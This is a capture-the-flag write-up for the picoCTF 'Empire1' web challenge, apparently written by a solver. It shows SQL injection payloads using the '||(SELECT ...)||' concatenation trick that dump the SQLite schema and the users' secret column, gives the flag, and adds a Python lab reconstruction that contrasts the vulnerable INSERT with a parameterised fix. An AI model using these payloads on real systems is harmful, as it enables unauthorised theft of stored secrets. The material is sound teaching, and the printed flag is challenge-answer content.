Empire1
Points: 400
Category
Web Exploitation
Question
Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/37779/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:37779
Hint
Pay attention to the feedback you get
There is very limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.
The database gets reverted every 2 hours if you do break it, just come back later
Solution
After registering and signing in, we see a nav bar with three entries: Add a Todo, Your Todos and Employee Listing. None of them looks vulnerable at first glance.
Adding an item to the todo list (here the text Hello) renders this markup:
<h1 class="page-header">Things You Gotta Do</h1>
<ul class="list-unstyled">
<div class="row">
<div class="col-md-6">
<div class="well well-sm">
<li>
<strong>Very Urgent:</strong> Hello
</li>
</div>
</div>
</div>
The "Very Urgent:" prefix is prepended server-side to whatever text the user submits. This is the feedback the hint points at: the stored item looks like it is assembled by string concatenation before it is written to the database.
After trying different strategies, I found that the todo item is vulnerable to SQL injection using the syntax '||(SQL)||'. The leading quote closes the string literal the application opened for our text, || is SQLite's string concatenation operator, the parenthesised subquery is evaluated and spliced into the value, and the trailing quote reopens the literal so the INSERT stays syntactically valid. Because the concatenated result is stored as the todo item itself, the output of the subquery comes back in plain text on the Your Todos page; no blind or error-based technique is needed.
The first payload dumps the schema: ' || (SELECT group_concat(sql) FROM sqlite_master) || '
The stored item comes back as:
CREATE TABLE user ( id INTEGER NOT NULL, username VARCHAR(64), name VARCHAR(128), password_hash VARCHAR(128), secret VARCHAR(128), admin INTEGER, PRIMARY KEY (id) ),CREATE UNIQUE INDEX ix_user_username ON user (username),CREATE TABLE todo ( id INTEGER NOT NULL, item VARCHAR(256), user_id INTEGER, PRIMARY KEY (id), FOREIGN KEY(user_id) REFERENCES user (id) )
The user table has a secret VARCHAR(128) column, so the next payload concatenates every value in it: ' || (SELECT group_concat(secret) FROM user) || '
Open the Your Todos tab and the new item contains all the secrets, including the flag: Very Urgent: Likes Oreos.,Know it all.,picoCTF{wh00t_it_a_sql_injecta4dfbd62}
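To make the mechanism concrete, here is an added example (my own code, not the challenge's source) that rebuilds the schema from the sqlite_master dump above in an in-memory SQLite database, reconstructs a hypothetical version of the bug (the "Very Urgent: " prefix and the user's text formatted straight into the INSERT), runs both payloads from the writeup against it, and shows the parameterised INSERT that stores the same payload harmlessly. The user rows and their secrets are constructed placeholders, and the function names are assumptions.

```python
import sqlite3

# Schema as recovered from the sqlite_master dump in the writeup.
SCHEMA = """
CREATE TABLE user (
    id INTEGER NOT NULL,
    username VARCHAR(64),
    name VARCHAR(128),
    password_hash VARCHAR(128),
    secret VARCHAR(128),
    admin INTEGER,
    PRIMARY KEY (id)
);
CREATE UNIQUE INDEX ix_user_username ON user (username);
CREATE TABLE todo (
    id INTEGER NOT NULL,
    item VARCHAR(256),
    user_id INTEGER,
    PRIMARY KEY (id),
    FOREIGN KEY(user_id) REFERENCES user (id)
);
"""

# Constructed sample rows; the secrets are placeholders, not the challenge's data.
SAMPLE_USERS = [
    (1, "agent513", "Agent 513", "x", "Likes Oreos.", 0),
    (2, "boss", "The Boss", "x", "Know it all.", 1),
    (3, "admin", "Admin", "x", "FLAG{placeholder}", 1),
]

PREFIX = "Very Urgent: "


def new_db():
    """Fresh in-memory database with the challenge schema and sample users."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db


def add_todo_vulnerable(db, user_id, text):
    """Hypothetical reconstruction of the bug: prefix and user text are
    formatted into the SQL string, so a quote in `text` ends the literal."""
    sql = "INSERT INTO todo (item, user_id) VALUES ('%s%s', %d)" % (PREFIX, text, user_id)
    cur = db.execute(sql)
    db.commit()
    return cur.lastrowid


def add_todo_safe(db, user_id, text):
    """The fix: bind the value as a parameter; the driver never parses it as SQL."""
    cur = db.execute(
        "INSERT INTO todo (item, user_id) VALUES (?, ?)", (PREFIX + text, user_id)
    )
    db.commit()
    return cur.lastrowid


def your_todos(db, user_id):
    """What the Your Todos page renders: the stored items for this user."""
    rows = db.execute(
        "SELECT item FROM todo WHERE user_id = ? ORDER BY id", (user_id,)
    ).fetchall()
    return [r[0] for r in rows]


def inject(db, user_id, subquery):
    """Wrap a subquery in the '||(...)||' pattern and return the stored result.

    The resulting statement is
        ... VALUES ('Very Urgent: '||(<subquery>)||'', <user_id>)
    which is valid SQLite: the subquery result is concatenated into the item.
    """
    payload = "'||(%s)||'" % subquery
    add_todo_vulnerable(db, user_id, payload)
    return your_todos(db, user_id)[-1]


if __name__ == "__main__":
    db = new_db()
    print(inject(db, 1, "SELECT group_concat(sql) FROM sqlite_master"))
    print(inject(db, 1, "SELECT group_concat(secret) FROM user"))
    add_todo_safe(db, 1, "'||(SELECT group_concat(secret) FROM user)||'")
    print(your_todos(db, 1)[-1])  # payload stored literally, nothing executed
```

The first two calls reproduce the writeup's two steps (schema dump, then group_concat of the secret column), while the last shows that with a bound parameter the identical payload is just text in the todo list. The challenge's "very limited filtering" is not modelled here; the point is that the only real fix is parameterisation, not a blocklist.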
Flag
picoCTF{wh00t_it_a_sql_injecta4dfbd62}